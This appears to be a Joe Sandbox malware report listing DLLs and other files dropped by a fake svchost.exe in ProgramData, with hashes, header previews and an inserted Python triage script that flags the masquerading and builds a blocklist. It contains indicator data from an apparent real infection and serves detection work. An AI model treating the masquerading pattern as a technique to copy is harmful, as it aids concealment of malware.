                                                                                                                                                          SHA-256:AE56E19DA96204E7A9CDC0000F96A7EF15086A9FE1F686687CB2D6FBCB037CD6
                                                                                                                                                          SHA-512:FDB97D1367852403245FC82CB1467942105E4D9DB0DE7CF13A73658905139BB9AE961044BEB0A0870429A1E26FE00FC922FBD823BD43F30F825863CAD2C22CEA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......=M....`A........................................p................0...............0..h&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.788678681522991
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:fkDfIecWhhW/WvkJ0f5AbVWQ4cRWSXgp13s5yX01k9z3A3MLGO:fkDfIecWhhWLaabl4cYR9zEM3
                                                                                                                                                          MD5:4380D56A3B83CA19EA269747C9B8302B
                                                                                                                                                          SHA1:0C4427F6F0F367D180D37FC10ECBE6534EF6469C
                                                                                                                                                          SHA-256:A79C7F86462D8AB8A7B73A3F9E469514F57F9FE456326BE3727352B092B6B14A
                                                                                                                                                          SHA-512:1C29C335C55F5F896526C8EE0F7160211FD457C1F1B98915BCC141112F8A730E1A92391AB96688CBB7287E81E6814CC86E3B057E0A6129CBB02892108BFAFAF4
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 4.583429497884519
Encrypted: false
SSDEEP: 192:SWhhWpWvkJ0f5AbVWQ4cRWlwbx56CqRqNX01k9z3A8oXnlSP:SWhhWRaablbN5DNR9zrGQ
MD5: 9082D23943B0AA48D6AF804A2F3609A2
SHA1: C11B4E12B743E260E8B3C22C9FACE83653D02EFE
SHA-256: 7ECC2E3FE61F9166FF53C28D7CB172A243D94C148D3EF13545BC077748F39267
SHA-512: 88434A2B996ED156D5EFFBB7960B10401831E9B2C9421A0029D2D8FA651B9411F973E988565221894633E9FFCD6512F687AFBB302EFE2273D4D1282335EE361D
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22112
Entropy (8bit): 4.750751888281197
Encrypted: false
SSDEEP: 192:xGeVvWhhWN6WvkJ0f5AbVWQ4OW7bplZD2X01k9z3AG2LzS4:xGeVvWhhWNCaab2pyR9zV2zS4
MD5: 772F1B596A7338F8EA9DDFF9ABA9447D
SHA1: CDA9F4B9808E9CEF2AEAC2AC6E7CDF0E8687C4C5
SHA-256: CC1BFCE8FE6F9973CCA15D7DFCF339918538C629E6524F10F1931AE8E1CD63B4
SHA-512: 8C94890C8F0E0A8E716C777431022C2F77B69EBFAA495D541E2D3312AE1DA307361D172EFCE94590963D17FE3FCAC8599DCABE32AB56E01B4D9CF9B4F0478277
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@......7.....`A........................................p...<............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22128
Entropy (8bit): 4.664471809242636
Encrypted: false
SSDEEP: 192:7ZyMvrRWhhW8WGxVA6VWQ4cRWquEg56CqRqNX01k9z3A8oXW98laI:7ZyMvdWhhW8xdlq5DNR9zrG2o
MD5: 84B1347E681E7C8883C3DC0069D6D6FA
SHA1: 9E62148A2368724CA68DFA5D146A7B95C710C2F2
SHA-256: 1CB48031891B967E2F93FDD416B0324D481ABDE3838198E76BC2D0CA99C4FD09
SHA-512: 093097A49080AEC187500E2A9E9C8CCD01F134A3D8DC8AB982E9981B9DE400DAE657222C20FB250368ECDDC73B764B2F4453AB84756B908FCB16DF690D3F4479
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@.......t....`A........................................p................0...............0..p&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 5.1446624716472735
Encrypted: false
SSDEEP: 384:xEwidv3V0dfpkXc0vVaCUWhhWHaablKR9zVR:aHdv3VqpkXc0vVa4qzE9z
MD5: 6EA31229D13A2A4B723D446F4242425B
SHA1: 036E888B35281E73B89DA1B0807EA8E89B139791
SHA-256: 8ECCABA9321DF69182EE3FDB8FC7D0E7615AE9AD3B8CA53806ED47F4867395AE
SHA-512: FA834E0E54F65D9A42AD1F4FB1086D26EDFA182C069B81CFF514FEB13CFCB7CB5876508F1289EFBC2D413B1047D20BAB93CED3E5830BF4A6BB85468DECD87CB6
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@......zM....`A........................................p...X............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 4.827260305412209
Encrypted: false
SSDEEP: 192:ptZ3pWhhWpaWvkJ0f5AbVWQ4cRWTjPtngqtVVwX01k9z3AcVj:ptZ3pWhhWEaablmrVwR9zHp
MD5: DD6F223B4F9B84C6E9B2A7CF49B84FC7
SHA1: 2EE75D635D21D628E8083346246709A71B085710
SHA-256: 8356F71C5526808AF2896B2D296CE14E812E4585F4D0C50D7648BC851B598BEF
SHA-512: 9C12912DAEA5549A3477BAA2CD05180702CF24DD185BE9F1FCA636DB6FBD25950C8C2B83F18D093845D9283C982C0255D6402E3CDEA0907590838E0ACB8CC8C1
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......c....`A........................................p...x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22128
Entropy (8bit): 4.913093601910681
Encrypted: false
SSDEEP: 192:yaIMFSgWhhW5JWGxVA6VWQ4cRWpRTJz56CqRqNX01k9z3A8oX/ld:ydgWhhW/xdlATh5DNR9zrGP
MD5: 9CA65D4FE9B76374B08C4A0A12DB8D2F
SHA1: A8550D6D04DA33BAA7D88AF0B4472BA28E14E0AF
SHA-256: 8A1E56BD740806777BC467579BDC070BCB4D1798DF6A2460B9FE36F1592189B8
SHA-512: 19E0D2065F1CA0142B26B1F5EFDD55F874F7DDE7B5712DD9DFD4988A24E2FCD20D4934BDDA1C2D04B95E253AA1BEE7F1E7809672D7825CD741D0F6480787F3B3
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 4.818883643812602
Encrypted: false
SSDEEP: 192:MNBWhhWXWvkJ0f5AbVWQ4cRWysu56CqRqNX01k9z3A8oXPl1D:MXWhhWzaablb5DNR9zrGnD
MD5: 2554060F26E548A089CAB427990AACDF
SHA1: 8CC7A44A16D6B0A6B7ED444E68990FF296D712FE
SHA-256: 5AB003E899270B04ABC7F67BE953EACCF980D5BBE80904C47F9AAF5D401BB044
SHA-512: FD4D5A7FE4DA77B0222B040DC38E53F48F7A3379F69E2199639B9F330B2E55939D89CE8361D2135182B607AD75E58EE8E34B90225143927B15DCC116B994C506
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@......JH....`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 4.599642754410154
Encrypted: false
SSDEEP: 192:5WhhWqMWvkJ0f5AbVWQ4cRWHLlDrwLobDX01k9z3AU93mldvQ:5WhhWqIaablklDMyDR9z/93mldvQ
MD5: 427F0E19148D98012968564E4B7E622A
SHA1: 488873EB98133E20ACD106B39F99E3EBDFACA386
SHA-256: 0CBACACCEDAF9B6921E6C1346DE4C0B80B4607DACB0F7E306A94C2F15FA6D63D
SHA-512: 03FA49BDADB65B65EFED5C58107912E8D1FCCFA13E9ADC9DF4441E482D4B0EDD6FA1BD8C8739CE09654B9D6A176E749A400418F01D83E7AE50FA6114D6AEAD2B
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\svchost.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 22120
Entropy (8bit): 4.9059107418499295
Encrypted: false
SSDEEP: 192:Xv0WhhW4WvkJ0f5AbVWQ4cRWG142Jp13s5yX01k9z3A3MIMttG5+:sWhhW8aabllxcYR9zEMIM3
MD5: 42EE890E5E916935A0D3B7CDEE7147E0
SHA1: D354DB0AAC3A997B107EC151437EF17589D20CA5
SHA-256: 91D7A4C39BAAC78C595FC6CF9FD971AA0A780C297DA9A8B20B37B0693BDCD42C
SHA-512: 4FAE6D90D762ED77615D0F87833152D16B2C122964754B486EA90963930E90E83F3467253B7ED90D291A52637374952570BD9036C6B8C9EAEBE8B05663EBB08E
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......[.....`A.........................................................0...............0..h&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

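The dropped-file records above share one pattern worth automating: every DLL is written by C:\ProgramData\svchost.exe, a Windows service-host name running from a user-writable directory rather than System32, and every Preview begins with an MZ/PE header whose machine bytes agree with the "x86-64" file type. The script below is an added example (editor's code, not Joe Sandbox's) that parses this Key:Value listing into records, applies those two sanity checks plus hash-format validation, and emits the SHA-256 values marked Malicious as a hunting list. The two sample records are copied from the report above with the Preview truncated; the list of "system binary names" and the directories they are expected in are the editor's assumptions, as is the 'PE..d' heuristic (the printable rendering of the PE signature followed by machine 0x8664).

```python
"""Triage Joe Sandbox 'Dropped Files' records (added example, not sandbox code)."""
import re

# Constructed input: two records copied from the report above (hashes and
# metadata are the report's own; Preview is cut to its first bytes).
SAMPLE_REPORT = """\
Process:C:\\ProgramData\\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.583429497884519
Encrypted:false
MD5:9082D23943B0AA48D6AF804A2F3609A2
SHA1:C11B4E12B743E260E8B3C22C9FACE83653D02EFE
SHA-256:7ECC2E3FE61F9166FF53C28D7CB172A243D94C148D3EF13545BC077748F39267
Malicious:true
Preview:MZ......................@.....PE..d......e..
Process:C:\\ProgramData\\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22112
Entropy (8bit):4.750751888281197
Encrypted:false
MD5:772F1B596A7338F8EA9DDFF9ABA9447D
SHA1:CDA9F4B9808E9CEF2AEAC2AC6E7CDF0E8687C4C5
SHA-256:CC1BFCE8FE6F9973CCA15D7DFCF339918538C629E6524F10F1931AE8E1CD63B4
Malicious:true
Preview:MZ......................@.....PE..d......Z..
"""

# Editor's assumption: these names belong under the Windows system directories;
# the same name anywhere else is a masquerading indicator, not a known-good file.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Expected hex-digit length of each hash field as the report labels them.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}


def parse_records(text):
    """Split the flat Key:Value listing into one dict per dropped file.
    A new record starts at every 'Process:' line, matching the report layout."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def triage(rec):
    """Return the findings for one record; an empty list means nothing odd."""
    findings = []
    proc = rec.get("Process", "").lower()
    name = proc.rsplit("\\", 1)[-1]
    if name in SYSTEM_NAMES and not proc.startswith(SYSTEM_DIRS):
        findings.append(f"system binary name outside system dir: {rec['Process']}")
    for algo, n in HASH_LEN.items():
        digest = rec.get(algo)
        if digest is not None and not re.fullmatch(rf"[0-9A-Fa-f]{{{n}}}", digest):
            findings.append(f"malformed {algo}: {digest}")
    preview = rec.get("Preview", "")
    if not preview.startswith("MZ"):
        findings.append("preview lacks MZ header")
    # Heuristic (assumption): in the printable preview, 'PE..d' is 'PE\0\0'
    # followed by the low byte of machine 0x8664 (AMD64). If the sandbox says
    # x86-64 but the bytes do not show that, the record deserves a second look.
    if "x86-64" in rec.get("File Type", "") and "PE..d" not in preview:
        findings.append("file type says x86-64 but preview does not show an AMD64 PE header")
    return findings


def malicious_sha256(records):
    """Hunting list: SHA-256 of every record the sandbox marked Malicious:true."""
    return sorted(r["SHA-256"] for r in records
                  if r.get("Malicious") == "true" and "SHA-256" in r)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in recs:
        print(r["SHA-256"], triage(r))
    print("IOCs:", malicious_sha256(recs))
```

Run against the full listing, the masquerading check fires on every record here because all of them come from C:\ProgramData\svchost.exe; the hash and header checks are there to catch copy errors when these values are pasted into a blocklist, since a truncated SHA-256 silently matches nothing.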
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26224
Entropy (8bit):4.884873448198051
Encrypted:false
SSDEEP:192:p9cyRWhhWnWGxVA6VWQ4cRWstTmil56CqRqNX01k9z3A8oXMQlE5V:YyRWhhWfxdlv3l5DNR9zrGMH
MD5:33B85A64C4AF3A65C4B72C0826668500
SHA1:315DDB7A49283EFE7FCAE1B51EBD6DB77267D8DF
SHA-256:8B24823407924688ECAFC771EDD9C58C6DBCC7DE252E7EBD20751A5B9DD7ABEF
SHA-512:B3A62CB67C7FE44CA57AC16505A9E9C3712C470130DF315B591A9D39B81934209C8B48B66E1E18DA4A5323785120AF2D9E236F39C9B98448F88ADAB097BC6651
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.744678517210711
Encrypted:false
SSDEEP:192:QWhhW8WGxVA6VWQ4cRWpuWQd9ZnAOVX01k9z3AAcoBVt/p:QWhhW8xdl331AqR9z75x
MD5:F983F25BF0AD58BCFA9F1E8FD8F94FCB
SHA1:27EDE57C1A59B64DB8B8C3C1B7F758DEB07942E8
SHA-256:A5C8C787C59D0700B5605925C8C255E5EF7902716C675EC40960640B15FF5ACA
SHA-512:AC797FF4F49BE77803A3FE5097C006BB4806A3F69E234BF8D1440543F945360B19694C8ECF132CCFBD17B788AFCE816E5866154C357C27DFEB0E97C0A594C166
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):5.19435562954873
Encrypted:false
SSDEEP:192:LpUEpnWlC0i5C5WhhWQWvkJ0f5AbVWQ4cRWFVE7weX01k9z3AUSxi:LptnWm5C5WhhWkaabl4EnR9zVS
MD5:931246F429565170BB80A1144B42A8C4
SHA1:E544FAD20174CF794B51D1194FD780808F105D38
SHA-256:A3BA0EE6A4ABC082B730C00484D4462D16BC13EE970EE3EEE96C34FC9B6EF8ED
SHA-512:4D1D811A1E61A8F1798A617200F0A5FFBDE9939A0C57B6B3901BE9CA8445B2E50FC736F1DCE410210965116249D77801940EF65D9440700A6489E1B9A8DC0A39
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.866130836410174
Encrypted:false
SSDEEP:192:mvh8Y17aFBRUWhhW1WGxVA6VWQ4cRWKk4NQlO8X01k9z3AenyHTs5:ALRWhhWhxdl3KlO8R9zhyH2
MD5:546DA2B69F039DA9DA801EB7455F7AB7
SHA1:B8FF34C21862EE79D94841C40538A90953A7413B
SHA-256:A93C8AF790C37A9B6BAC54003040C283BEF560266AEEC3D2DE624730A161C7DC
SHA-512:4A3C8055AB832EB84DD2D435F49B5B748B075BBB484248188787009012EE29DC4E04D8FD70110E546CE08D0C4457E96F4368802CAEE5405CFF7746569039A555
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.83017471722019
Encrypted:false
SSDEEP:192:eUnWhhWGWGxVA6VWQ4cRW4Ugd9ZnAOVX01k9z3AAcos:XWhhWyxdlCg31AqR9z7Q
MD5:D8302FC8FAC16F2AFEBF571A5AE08A71
SHA1:0C1AEE698E2B282C4D19011454DA90BB5AB86252
SHA-256:B9AE70E8F74615EA2DC6FC74EC8371616E57C8EFF8555547E7167BB2DB3424F2
SHA-512:CD2F4D502CD37152C4B864347FB34BC77509CC9E0E7FE0E0A77624D78CDA21F244AF683EA8B47453AA0FA6EAD2A0B2AF4816040D8EA7CDAD505F470113322009
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):30312
Entropy (8bit):5.1326972903419925
Encrypted:false
SSDEEP:384:+7yaFM4Oe59Ckb1hgmLNWhhWLmaabsFNY+R9zITl:MFMq59Bb1jg3zgNYi9zIh
MD5:E9036FD8B4D476807A22CB2EB4485B8A
SHA1:0E49D745643F6B0A7D15EA12B6A1FE053C829B30
SHA-256:BFC8AD242BF673BF9024B5BBE4158CA6A4B7BDB45760AE9D56B52965440501BD
SHA-512:F1AF074CCE2A9C3A92E3A211223E05596506E7874EDE5A06C8C580E002439D102397F2446CE12CC69C38D5143091443833820B902BB07D990654CE9D14E0A7F0
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22024
Entropy (8bit):4.856891868078439
Encrypted:false
SSDEEP:192:PeXrqjd7xWhhWYWGxVA6VWQ42WnsxgV8FGecX01k9z3Ax+eXVG6:P4roWhhWAxdeHR9zi9r
MD5:AD586EA6AC80AC6309421DEEEA701D2F
SHA1:BC2419DFF19A9AB3C555BC00832C7074EC2D9186
SHA-256:39E363C47D4D45BEDA156CB363C5241083B38C395E4BE237F3CFEDA55176453C
SHA-512:15C17CBA6E73E2E2ADB0E85AF8ED3C0B71D37D4613D561CE0E818BDB2CA16862253B3CB291E0CF2475CEDCB7CE9F7B4D66752817F61CF11C512869EF8DABC92A
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26216
Entropy (8bit):5.016983259688826
Encrypted:false
SSDEEP:192:RmGqX8mPrpJhhf4AN5/Ki9WhhWalWvkJ0f5AbVWQ4cRWpfd9ZnAOVX01k9z3AAco:Rysyr7LWhhWgaablu31AqR9z7
MD5:3AE4741DB3DDBCB205C6ACBBAE234036
SHA1:5026C734DCEE219F73D291732722691A02C414F2
SHA-256:C26540E3099FA91356EE69F5058CF7B8AEE63E23D6B58385476D1883E99033C3
SHA-512:9DD5E12265DA0F40E3C1432FB25FD19BE594684283E961A2EAFFD87048D4F892D075DCD049AB08AEEE582542E795A0D124B490D321D7BEB7963FD778EF209929
Malicious:true
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26216
Entropy (8bit):5.289373435146636
Encrypted:false
SSDEEP:384:mV2oFVh/WhhWqaablTUmEjezWSR9zchT1:mZcXzemiq9zW
MD5:9A7E2A550C64DABFF61DAD8D1574C79A
SHA1:8908DE9D45F76764140687389BFAED7711855A2D
SHA-256:DB059947ACE80D2C801F684A38D90FD0292BDAA1C124CD76467DA7C4329A8A32
SHA-512:70A6EB10A3C3BAD45BA99803117E589BDA741ECBB8BBDD2420A5AE981003AEBE21E28CB437C177A3B23F057F299F85AF7577FEC9693D59A1359E5FFC1E8EAABD
Malicious:true
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26224
                                                                                                                                                          Entropy (8bit):5.286281713611342
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ECV5yguNvZ5VQgx3SbwA71IkFltor9zLszv:35yguNvZ5VQgx3SbwA71IutoBzLU
                                                                                                                                                          MD5:CF115DB7DCF92A69CB4FD6E2AE42FED5
                                                                                                                                                          SHA1:B39AA5ECA6BE3F90B71DC37A5ECF286E3DDCA09A
                                                                                                                                                          SHA-256:EB8FE2778C54213AA2CC14AB8CEC89EBD062E18B3E24968ACA57E1F344588E74
                                                                                                                                                          SHA-512:8ABD2754171C90BBD37CA8DFC3DB6EDAF57CCDD9BC4CE82AEF702A5CE8BC9E36B593DC863D9A2ABD3B713A2F0693B04E52867B51CD578977A4A9FDE175DBA97A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.246244940293721
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ms3hwD2WhhWLjWvkJ0f5AbVWQ4cRWcBweNQlO8X01k9z3AenDqzq:dWhhWTaabl3weKlO8R9zhDgq
                                                                                                                                                          MD5:82E6D4FF7887B58206199E6E4BE0FEAF
                                                                                                                                                          SHA1:943E42C95562682C99A7ED3058EA734E118B0C44
                                                                                                                                                          SHA-256:FB425BF6D7EB8202ACD10F3FBD5D878AB045502B6C928EBF39E691E2B1961454
                                                                                                                                                          SHA-512:FF774295C68BFA6B3C00A1E05251396406DEE1927C16D4E99F4514C15AE674FD7AC5CADFE9BFFFEF764209C94048B107E70AC7614F6A8DB453A9CE03A3DB12E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.804443409916024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:gj/fHQduzWhhWxWvkJ0f5AbVWQ4cRWIknb7jepVWnSX01k9z3AThTVtXKX7:gj/fFWhhWJaablMb7jezWSR9zchT2X
                                                                                                                                                          MD5:9A3B4E5B18A946D6954F61673576FA11
                                                                                                                                                          SHA1:74206258CFD864F08E26EA3081D66297221B1D52
                                                                                                                                                          SHA-256:CE74A264803D3E5761ED2C364E2196AC1B391CB24029AF24AEE8EF537EC68738
                                                                                                                                                          SHA-512:DA21178F2E7F4B15C28AE7CB0CC5891EAA3BDD0192042965861C729839983C7DCBA9CFB96930B52DBE8A592B4713AA40762E54D846B8135456A09AE5BACBB727
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):880569
                                                                                                                                                          Entropy (8bit):5.682992961060893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YID3dOVwx/fpEWertSLMNu:lgYJiVBFLa2vIVwx/fpEWe+MNu
                                                                                                                                                          MD5:362D93516DEB1D6E6F9B8076415D9122
                                                                                                                                                          SHA1:029541DDA9199A5FB84138D76049A4F42D603C36
                                                                                                                                                          SHA-256:887F69E682EBD3A402D9E3462910D8EAB88D8AA8066F71B7D0AB28B1306A4314
                                                                                                                                                          SHA-512:F1FDADD9CFD8DA84B1BEFFA12BCA2B4C26DFEF146204CF45EE8395B9F3419BDE0E9106BE82414D01B3509FE83D09EFD0BBB40D530B0A790DCB4A51A031FE4EDA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):316928
                                                                                                                                                          Entropy (8bit):6.399172981599646
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:RrdaOOOJPELEbEhSoKbVeKuJgu3rAkbK7xokgwHSkbj57ytyE/pZxFuVpOUrjenn:SO2h0b0KuJguLbLFhkn57MyE3xFWpOn
                                                                                                                                                          MD5:169518669942F1B7C9A0BC4D0D98651F
                                                                                                                                                          SHA1:4C2132A29ABCD0B2E26F96D7BA54BC8968CC4853
                                                                                                                                                          SHA-256:4904336E5DDD08DB8BE7694EEF0D1D83DE6799D6412952A82DCA4847A3F46251
                                                                                                                                                          SHA-512:270AB970EB7C9BD5DB40FEF76F78FCA68A40266390F16D971C946A086F7C079314B78E068477CD083D9FAE2E76EE7CC8A4D8BA7DDC4F5F5B0C78767B77A4F858
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
